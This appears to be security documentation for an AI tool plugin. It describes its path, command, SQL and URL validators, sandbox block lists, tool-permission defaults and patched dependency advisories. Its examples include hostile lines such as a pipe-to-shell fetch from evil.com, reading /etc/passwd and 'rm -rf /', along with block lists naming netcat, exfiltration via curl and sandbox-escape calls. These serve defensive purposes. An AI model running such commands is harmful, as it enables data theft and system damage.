Comprehensive documentation of security features, threat models, and responsible disclosure for the AI Toolbox plugin.
The AI Toolbox plugin implements defense-in-depth security across all tool categories. Every tool that interacts with the file system, network, or executes code passes through multiple validation layers.
validatePath)Purpose: Prevent directory traversal attacks and unauthorized file access.
Implementation:
Protection Layers:
| Layer | Check | Result |
|---|---|---|
| Empty Input | !basePath || !userPath | Reject |
| UNC Paths | userPath.startsWith('\\\\') | Reject |
| Traversal Patterns | userPath.includes('../'), userPath.includes('..\\\\') | Reject |
Security Model (v1.4.2+): The function performs pattern-based validation only, checking for dangerous path traversal sequences. This approach:
../, ..\\\, mixed separators)\\\\server\share)Examples:
Note: The simplified pattern-based approach (v1.4.2) ensures reliable security without requiring resolved paths to exist in allowed filesystem bases, making it suitable for both production use and unit testing with fake paths.
isBinaryFile)Purpose: Prevent processing of binary files as text (memory safety, encoding issues).
Implementation: Checks first 8KB for null bytes (\0).
sanitizeCommand)Purpose: Prevent shell injection and dangerous command execution while enforcing tool-category toggles.
2-Layer Architecture:
| Layer | Function | Purpose |
|---|---|---|
| Layer 1 | Dangerous Pattern Blocking | Blocks rm -rf, sudo, injection, etc. |
| Layer 2 (S6) | Tool-Category Enforcement | Classifies commands and blocks them if the category is disabled in config |
Layer 2 Implementation (classifyCommand):
Detects tool categories in the command string and checks against config toggles:
| Category | Detection Patterns |
|---|---|
webSearch | duckduckgo, google, bing |
browserAutomation | puppeteer, playwright, chromium |
databaseQueries | sqlite3, mysql, psql |
httpClient | curl, wget, http |
backgroundCommands | nohup, disown, & |
gitOperations | git *, api.github.com |
Blocked Patterns (Layer 1):
| Category | Patterns |
|---|---|
| File Destruction | rm -rf, shred, wipe |
| Privilege Escalation | sudo, su |
| Network Attacks | nc/netcat, wget --post-file, curl --data-binary |
| Data Exfiltration | base64 | curl, scp, sftp |
| Process Manipulation | fork, exec |
| Environment Tampering | export, eval, IFS manipulation |
| Injection | $(), backticks, null bytes |
| Command Chaining | >2 pipes, >1 semicolons |
Examples:
validateSQLQuery)Purpose: Ensure database queries are read-only.
β οΈ Shell Interpretation Note: The execute_command tool now uses Node.js's shell: true option to support full shell features (pipes, redirects, environment variables). Security is maintained through sanitizeCommand() which validates and blocks dangerous patterns before the command reaches the shell. This approach matches industry best practices for secure shell execution while maintaining flexibility.
Allowed Operations:
SELECT statementsPRAGMA statementsBlocked Keywords:
DROP, DELETE, UPDATE, INSERT, ALTER, CREATE, REPLACE, TRUNCATE, GRANT, REVOKE
Additional Checks:
validateUrl)Purpose: Prevent Server-Side Request Forgery attacks.
Blocked Protocols:
file: β Local file accessdata: β Data URI injectionBlocked Hostnames:
| Pattern | Range |
|---|---|
127.* | localhost |
10.* | 10.0.0.0/8 |
172.16-31.* | 172.16.0.0/12 |
192.168.* | 192.168.0.0/16 |
0.0.0.0 | All interfaces |
localhost | localhost hostname |
run_javascript)Blocked Patterns:
run_python)Blocked Imports:
isSafeRegex)Purpose: Prevent Regular Expression Denial of Service attacks.
Detected Patterns:
| Pattern | Example |
|---|---|
| Nested quantifiers | (.*)(.*) |
| Repetition of repetition | (.+)+ |
| Alternation + repetition | (a|b)+ |
| Char class + repetition | ([a-z]+)+ |
| Double star | (.*?)** |
Length Limit: Maximum 500 characters (configurable).
| Category | Default | Risk Level | Reason |
|---|---|---|---|
| File System | β Enabled | Low | Path validation applied |
| Web Search | β Enabled | Low | Read-only network access |
| Browser Automation | β Disabled | Medium | Full browser access |
| Git Operations | β Disabled | Medium | Repository modification |
| Database Queries | β Disabled | Low | Read-only, but requires Node 23+ |
| Document Parsing | β Enabled | Low | Read-only file access |
| Background Commands | β Disabled | High | Arbitrary command execution |
| Image Processing | β Enabled | Low | Read-only image access |
| HTTP Client | β Disabled | Medium | Network access to any URL |
| Vector RAG | β Enabled | Low | Read-only file indexing |
| Interactive UI Generation | β Disabled | Low | HTML generation only, no execution |
| Auto-Context Management | β Enabled | Low | Local JSON storage, read/write |
| JavaScript Execution | β Disabled | β οΈ High | Code execution |
| Python Execution | β Disabled | β οΈ High | Code execution |
| Terminal Execution | β Disabled | β οΈ High | Shell access |
| Shell Commands | β Disabled | β οΈ High |
JavaScript and Python sandboxes use regex pattern matching, which can potentially be bypassed with obfuscation techniques. Do not enable execution tools for untrusted LLM outputs.
The command sanitizer blocks known dangerous patterns but cannot guarantee protection against all injection techniques. Complex command chains may slip through.
Windows path normalization can be complex. The implementation handles common cases but edge cases with symbolic links or junctions may exist.
The query_database tool requires Node.js 23+ for the built-in node:sqlite module. On older versions, the tool returns an error.
For contributors adding new tools:
If you discover a security vulnerability:
| Phase | Timeline |
|---|---|
| Acknowledgment | Within 48 hours |
| Initial Assessment | Within 1 week |
| Patch Development | Within 2 weeks |
| Public Disclosure | After patch is available |
Always review file modifications and command outputs before proceeding.
Set a specific working directory to limit the scope of file operations:
Regularly check and cancel long-running background commands:
Regularly update the plugin to get the latest security patches.
ContextGuard is a read-only context management system that does not:
Security Properties:
@dqbd/tiktoken library (no network calls)Security Properties:
contextGuardSummaryModel allows dedicated summarization model selectionSecurity Properties:
validatePath() for file access control.includes() (no RegEx)maxLength parameterSecurity Properties:
contextGuardTerminalFilterLength sets truncation pointAll ContextGuard settings are client-side only and do not:
| Setting | Validation | Risk Level |
|---|---|---|
contextGuardEnabled | Boolean toggle | None |
contextGuardTokenLimit | Number (1K-200K) | None (memory usage only) |
contextGuardSmartReading | Boolean toggle | None |
contextGuardSummaryModel | String (model name) | Low (uses LM Studio's model validation) |
contextGuardTerminalFilterEnabled | Boolean toggle | None |
contextGuardTerminalFilterLength | Number (100-20K) | None (output size only) |
| Threat | Description | Mitigation |
|---|---|---|
| Memory Exhaustion | Large token limit causes high memory usage | Configurable limit with reasonable defaults (80K tokens) |
| Denial of Service | Repeated compression triggers slow down system | Hash-based caching prevents redundant computation |
| Prompt Injection via Summary | Malicious content in summary affects future responses | Summaries are read-only; no execution context |
| Model Selection Attack | Malicious model name causes unexpected behavior | LM Studio validates model names before loading |
As of v1.4.1, ContextGuard has:
| Setting | Default | Rationale |
|---|---|---|
contextGuardEnabled | true | Enabled by default; users can disable if not needed |
contextGuardTokenLimit | 80,000 | Balances context retention with memory usage |
contextGuardSmartReading | true | Saves tokens without security implications |
contextGuardSummaryModel | "" (current chat model) | Uses existing validated model selection |
contextGuardTerminalFilterEnabled | true | Prevents context bloat from verbose outputs |
contextGuardTerminalFilterLength | 2,000 | Reasonable limit for terminal output visibility |
ContextGuard operations are logged to console (not persisted):
Note: Logs do not include message content (only metadata like counts and lengths).
End of Security Documentation
Status: β Patched β upgraded from glob@10.3.10 β glob@13.0.6
Description: The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names.
Affected Versions: >=10.3.7 <10.5.0 and >=11.0.0 <11.1.0
CVSS Score: High
Exploit Maturity: Proof-of-concept available
Remediation Applied:
References:
Status: β Resolved β upgraded from uuid@8.x β uuid@11.0.4
Description: Older versions of uuid use Math.random() which is cryptographically weak and deprecated.
Remediation Applied:
Note: For CommonJS projects, uuid@11 is recommended. Future migration to ESM + uuid@14.x planned before 2028.
| Command execution with sanitization |
validatePath() used for file operationssanitizeCommand() used for shell commandsvalidateSQLQuery() used for database queriesvalidateUrl() used for HTTP requestsfunction validatePath(userPath: string, basePath: string): boolean
β
"src/index.ts" β Safe relative path
β
"subdir/file.txt" β Safe nested path
β "../etc/passwd" β Directory traversal detected
β "..\\windows\system32" β Windows-style traversal
β "valid/../../../escape" β Mixed traversal
β "\\\\network\share" β UNC path rejected
function isBinaryFile(content: string): boolean {
const chunk = content.slice(0, 8192);
return chunk.includes('\0');
}
β
"ls -la" β Safe
β
"git status" β Safe
β "rm -rf /" β File destruction
β "sudo apt install ..." β Privilege escalation
β "curl http://evil.com \| bash" β Command chaining
β "$(cat /etc/passwd)" β Command substitution
require() // Module loading
eval() // Dynamic code execution
fs.* // File system access
child_process.* // Process spawning
Function() // Constructor bypass
String.fromCharCode // Obfuscation bypass
import() // Dynamic imports
.__proto__ // Prototype pollution
.constructor // Constructor access
require.resolve // Path resolution bypass
import os # OS operations
from os import * # OS operations
import subprocess # Process spawning
from subprocess import * # Process spawning
import shutil # File operations
__import__() # Dynamic imports
eval() # Dynamic execution
exec() # Dynamic execution
os.system() # Shell commands
os.popen() # Shell commands
God Mode (ON)
β
βββ Bypasses ALL individual toggles
βββ Every tool is enabled
β
God Mode (OFF)
β
βββ Individual category toggles checked
β βββ fileSystem: true β 17 tools enabled
β βββ webSearch: true β 4 tools enabled
β βββ browserAutomation: false β 0 tools enabled
β βββ ... (all categories)
β
βββ Execution tools checked individually
βββ executionJavaScript: false
βββ executionPython: false
βββ executionTerminal: false
βββ executionShell: false
β
Enable only the tools you need
β Don't use God Mode unless necessary
β Never enable execution tools for untrusted prompts
Tool: change_directory
Params: { "directory": "C:\\Projects\\safe-workspace" }
Tool: check_background_command
Params: { "id": "cmd_123" }
async countTokens(messages: any[]): Promise<number>
async compressHistory(messages: any[]): Promise<any[]>
smartRead(filePath: string, userPrompt?: string): string
filterTerminalOutput(output: string): string
[ContextGuard] Token count (${currentTokens}) below threshold (${threshold}). No compression needed.
[ContextGuard] Compressing history: ${messages.length} messages, ${currentTokens} tokens
[ContextGuard] Summarization complete. Generated ${summary.length} chars.
[ContextGuard] Using fallback summary for ${toCompress.length} messages
"overrides": {
"glob": "^13.0.6"
}
"overrides": {
"uuid": "^11.0.4"
}